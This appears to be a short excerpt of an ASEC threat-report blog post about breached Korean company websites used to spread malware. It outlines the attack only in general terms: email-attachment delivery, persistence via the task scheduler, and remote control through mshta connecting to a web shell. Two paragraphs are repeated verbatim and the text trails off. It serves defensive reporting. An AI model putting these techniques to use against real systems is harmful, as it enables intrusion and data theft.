Damages to Multiple Korean Websites Created by a Certain Website Development Company
Contents
AhnLab Security Emergency response Center (ASEC) has discovered instances of websites created by a certain Korean website development company being targeted by attacks and being used to distribute malware. This specific website development company has created websites for a wide range of companies including manufacturing, trade, electrical, electronics, education, construction, medical, and travel industries.
The breached websites were used to distribute malware, and they were also used to perform other features such as transmitting the information that was stolen through web shells. The initial distribution phase of this attack is similar to the one covered in a previous ASEC Blog post where the initial distribution was done through an email attachment. The infected system is registered to the task scheduler, allowing the breach to happen continuously.
If infected, the threat actor gains remote control of the victim’s PC by utilizing the normal process mshta to establish a connection with a web shell …
The breached websites were used to distribute malware, and they were also used to perform other features such as transmitting the information that was stolen through web shells. The initial distribution phase of this attack is similar to the one covered in a previous ASEC Blog post where the initial distribution was done through an email attachment. The infected system is registered to the task scheduler, allowing the breach to happen continuously.
If infected, the threat actor gains remote control of the victim’s PC by utilizing the normal process mshta to establish a connection with a web shell …